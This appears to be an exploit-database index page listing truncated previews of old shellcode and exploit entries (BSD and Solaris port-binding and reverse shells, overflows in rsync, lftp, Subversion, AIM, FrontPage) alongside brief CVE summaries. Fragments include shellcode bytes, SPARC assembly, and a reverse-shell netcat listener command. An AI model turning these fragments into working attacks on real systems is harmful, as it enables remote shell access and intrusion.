bsd/x86 portbind port random 143 bytes

Exploit for bsd/x86 platform in category shellcode ====================================== bsd/x86 portbind port random 143 bytes ====================================== Here is a BSD remote shellcode. Tested on NetBSD . SHould work on FreeBSD and OpenBSD . by MayheM ExileCrew www.exile2k.org / 143...

solaris/SPARC portbind port 6789 228 bytes

solaris/SPARC portbind port 6789 228 bytes. Shellcode exploit for solarissparc platform / Solaris shellcode - connects /bin/sh to a port Claes M. Nyberg 20020624 , / include / void mainvoid asm" ! Server address xor %l1, %l1, %l1 ! l1 = 0 st %l1, %sp - 12 ! 0 INADDRANY mov 0x2, %l1 ! AFINET sth...

bsd/x86 - reverse portbind 129 bytes

bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...

AOL Instant Messenger AIM - 'Away' Message Local Overflow

/ subject: local PoC exploit for AIM 5.5.3595 vendor: http://www.aim.com cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636 credits: Matt Murphy date: 10 August 2004 notes: exploits localy if an argument is supplied, otherwise prints the url. offsets are based on exe/dll provide...

Subversion 1.0.2 svn_time_from_cstring() Remote Exploit

Exploit for linux platform in category remote exploits ======================================================= Subversion 1.0.2 svntimefromcstring Remote Exploit ======================================================= / subversion-1.0.2 exploit by Gyan Chawdhary ... exploits a stack overflow in t...

PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)

Exploit for unknown platform in category remote exploits ======================================================= PSOProxy 0.91 Remote Buffer Overflow Exploit Win2k/XP ======================================================= / Copyright ? Rosiello Security http www rosiello org ================ -==...

rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation

rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation / rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com...

rsync 2.5.7 - Local Stack Overflow / Local Privilege Escalation

/ rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com This shellcode binds a shell on port 10000 stdin, stdout and...

rsync <= 2.5.7 Local stack overflow Root Exploit

Exploit for linux platform in category local exploits ================================================ rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode -...

Dream FTP 1.2 Remote Format String Exploit

Exploit for unknown platform in category remote exploits ========================================== Dream FTP 1.2 Remote Format String Exploit ========================================== include include include include // WIN NT/2K/XP cmd.exe shellcode // kernel32.dll baseaddress calculation:...

lftp 2.6.9 - Remote Stack Overflow

lftp 2.6.9 - Remote Stack Overflow / lftp remote stack-based overflow exploit by Li0n7 voila fr Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based overflow in trynetscapeproxy and trysquideplf...

CVE-2003-0809

Internet Explorer 5.01 through 6.0 does not properly handle object tags returned from a Web server during XML data binding, which allows remote attackers to execute arbitrary code via an HTML e-mail message or web page...

MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)

Exploit for unknown platform in category remote exploits ============================================================= MS Frontpage Server Extensions fp30reg.dll Exploit MS03-051 ============================================================= / Frontpage fp30reg.dll Overflow MS03-051 discovered by...

CVE-2003-0809

Internet Explorer 5.01 through 6.0 does not properly handle object tags returned from a Web server during XML data binding, which allows remote attackers to execute arbitrary code via an HTML e-mail message or web page...

CVE-2003-0809

Microsoft Internet Explorer 5.01–6.0 is affected by CVE-2003-0809 due to improper handling of object tags returned from a Web server during XML data binding, enabling remote code execution via HTML email or web pages. Affected software: IE 5.01–6.0. Root cause: object/HTML data binding issue in I...

Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow

Half-Life StatsMe 2.6.x Plugin - CMDARGV Buffer Overflow // source: https://www.securityfocus.com/bid/6575/info // The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the...

Half-Life StatsMe 2.6.x Plugin - MakeStats Format String

// source: https://www.securityfocus.com/bid/6578/info // The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context o...

cryptcat does not encrypt data communications when -e command argument is used

Overview With certain options used, cryptcat does not encrypt network connections as expected. Description Cryptcat is an enhanced version of netcat that adds twofish encryption.If cryptcat is started in listen server mode binding a shell to a network port, cryptcat fails to enable encryption...

CVE-2001-1065

Web-based configuration utility in Cisco 600 series routers running CBOS 2.0.1 through 2.4.2ap binds itself to port 80 even when web-based configuration services are disabled, which could leave the router open to attack...

CVE-2001-1433

Cherokee web server before 0.2.7 does not properly drop root privileges after binding to port 80, which could allow remote attackers to gain privileges via other vulnerabilities...